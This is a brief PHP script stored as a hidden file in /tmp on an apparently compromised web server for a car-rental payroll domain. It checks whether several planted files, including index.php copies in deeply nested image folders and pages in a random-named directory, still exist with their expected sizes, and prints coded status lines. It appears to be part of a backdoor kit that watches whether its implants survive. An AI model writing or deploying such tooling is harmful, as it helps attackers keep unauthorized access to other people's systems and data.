File: //tmp/.k
<?php $r = '/home/burhbrzf/payroll.burhanrentacar.net'; $x = ["/images/images/images/images/index.php"=>"bd@@428628@@34",
"/images/images/images/images/images/images/images/images/images/index.php"=>"bd@@428658@@3",
"/images/images/images/index.php"=>"bd@@430137@@91",
"/lqpjvnc/lang_nl.php"=>"bd@@417874@@1072",
"/lqpjvnc/frames_main.js.php"=>"bd@@428678@@557"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');